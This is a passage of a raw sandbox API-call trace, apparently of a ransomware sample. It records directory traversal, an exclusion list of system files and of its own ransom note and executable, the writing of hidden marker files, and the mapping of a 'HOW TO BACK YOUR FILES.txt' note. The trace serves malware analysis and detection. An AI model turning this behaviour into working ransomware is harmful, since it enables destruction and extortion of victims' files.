returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe" [0061.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1132d8 | out: hHeap=0xe0000) returned 1 [0061.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0061.314] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe" [0061.314] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\" [0061.314] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" [0061.314] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.318] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.320] FlushFileBuffers (hFile=0x27c) returned 1 [0061.321] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.322] CloseHandle (hObject=0x27c) returned 1 [0061.322] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe") returned 72 [0061.322] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.322] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabdcd6c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x913b2022, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xeddfc3e6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0061.322] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.322] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.322] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.323] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.323] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabdcd6c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x913b2022, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xeddfc3e6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.323] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.323] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.323] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.323] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.323] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.323] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeddfc3e6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeddfc3e6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeddfc3e6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.323] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.323] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.323] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfac4f463, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3a02b33d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3a02b33d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0061.323] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.323] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.323] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0061.323] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0061.323] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0061.323] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0061.323] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0061.323] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0061.323] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0061.323] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0061.323] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0061.323] lstrcpyW (in: lpString1=0x130ebca, lpString2="AC" | out: lpString1="AC") returned="AC" [0061.323] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0061.323] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x98) returned 0x113eb8 [0061.323] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122228 | out: ListHead=0xf68b0, ListEntry=0x122228) returned 0x122348 [0061.323] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfac02fce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fcf6d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfac02fce, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0061.323] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.323] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.323] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0061.323] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0061.323] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0061.323] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0061.324] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0061.324] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0061.324] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0061.324] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0061.324] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0061.324] lstrcpyW (in: lpString1=0x130ebca, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0061.324] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0061.324] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa2) returned 0x117e18 [0061.324] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x122228 [0061.324] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfac02fce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fd388, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfac02fce, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0061.324] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.324] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.324] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0061.324] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0061.324] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0061.324] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0061.324] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0061.324] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0061.324] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0061.324] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0061.324] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0061.324] lstrcpyW (in: lpString1=0x130ebca, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0061.324] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0061.324] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x1182e8 [0061.324] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x122248 [0061.324] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabdcd6c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fd7b1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfabdcd6c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0061.324] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.324] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.324] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0061.324] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0061.324] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0061.324] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0061.324] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0061.324] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0061.324] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0061.325] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0061.325] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0061.325] lstrcpyW (in: lpString1=0x130ebca, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0061.325] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221a0 [0061.325] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118658 [0061.325] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221a8 | out: ListHead=0xf68b0, ListEntry=0x1221a8) returned 0x122308 [0061.325] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabdcd6c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fdbad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfabdcd6c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0061.325] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.325] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.325] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0061.325] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0061.325] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0061.325] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0061.325] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0061.325] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0061.325] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0061.325] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0061.325] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0061.325] lstrcpyW (in: lpString1=0x130ebca, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0061.325] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0061.325] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x124198 [0061.325] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x1221a8 [0061.325] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfac02fce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713b1523, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x713b1523, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0061.325] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.325] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.325] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0061.325] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0061.325] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0061.325] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0061.325] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0061.325] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0061.325] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0061.325] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0061.325] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0061.325] lstrcpyW (in: lpString1=0x130ebca, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0061.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122320 [0061.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa4) returned 0x118b28 [0061.326] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122328 | out: ListHead=0xf68b0, ListEntry=0x122328) returned 0x122128 [0061.326] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9120e63a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9120e63a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9120e63a, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0061.326] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.326] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.326] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0061.326] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0061.326] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0061.326] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0061.326] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0061.326] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0061.326] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0061.326] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0061.326] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0061.326] lstrcpyW (in: lpString1=0x130ebca, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0061.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221c0 [0061.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x124028 [0061.326] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221c8 | out: ListHead=0xf68b0, ListEntry=0x1221c8) returned 0x122328 [0061.326] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabdcd6c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2592721, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfabdcd6c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0061.326] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.326] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.326] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0061.326] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0061.326] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0061.326] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0061.326] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0061.326] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0061.326] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0061.326] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0061.326] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0061.326] lstrcpyW (in: lpString1=0x130ebca, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0061.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0061.327] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa6) returned 0x117ec8 [0061.327] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x1221c8 [0061.327] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabdcd6c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2592721, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfabdcd6c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0061.327] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0061.327] lstrcpyW (in: lpString1=0x130ebca, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.327] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.327] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.327] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.327] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.328] CloseHandle (hObject=0x2a0) returned 1 [0061.328] CloseHandle (hObject=0x27c) returned 1 [0061.328] GetCurrentThreadId () returned 0xd98 [0061.328] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0061.328] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState" [0061.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ec8 | out: hHeap=0xe0000) returned 1 [0061.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0061.328] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState" [0061.328] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState\\" [0061.328] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" [0061.328] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.330] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.332] FlushFileBuffers (hFile=0x27c) returned 1 [0061.333] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.334] CloseHandle (hObject=0x27c) returned 1 [0061.334] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState") returned 82 [0061.334] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.334] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabdcd6c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2592721, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeddfc3e6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0061.334] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.334] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.334] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.334] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.334] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: 